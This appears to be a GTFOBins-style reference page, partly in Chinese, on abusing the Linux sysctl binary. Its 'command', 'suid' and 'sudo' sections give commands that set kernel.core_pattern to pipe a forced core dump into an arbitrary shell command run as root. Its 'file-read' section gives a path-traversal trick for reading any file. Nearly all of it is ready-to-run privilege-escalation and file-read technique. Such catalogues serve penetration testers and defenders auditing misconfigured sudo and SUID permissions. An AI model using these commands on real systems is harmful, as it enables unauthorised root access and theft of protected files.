.. / sysctl

command

运行非交互式系统命令来摆脱受限环境。

• The command is executed by root in the background when a core dump occurs.

  COMMAND='/bin/sh -c id>/tmp/id'
  sysctl "kernel.core_pattern=|$COMMAND"
  sleep 9999 &
  kill -QUIT $!
  cat /tmp/id
  

file-read

从文件中读取数据。

• The -p argument can also be used in place of -n. In both cases though the output might get corrupted, so this might not be suitable to read binary files.

  LFILE=要读取的文件路径
  /usr/sbin/sysctl -n "/../../$LFILE"
  

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• COMMAND='/bin/sh -c id>/tmp/id'
  ./sysctl "kernel.core_pattern=|$COMMAND"
  sleep 9999 &
  kill -QUIT $!
  cat /tmp/id
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• COMMAND='/bin/sh -c id>/tmp/id'
  sudo sysctl "kernel.core_pattern=|$COMMAND"
  sleep 9999 &
  kill -QUIT $!
  cat /tmp/id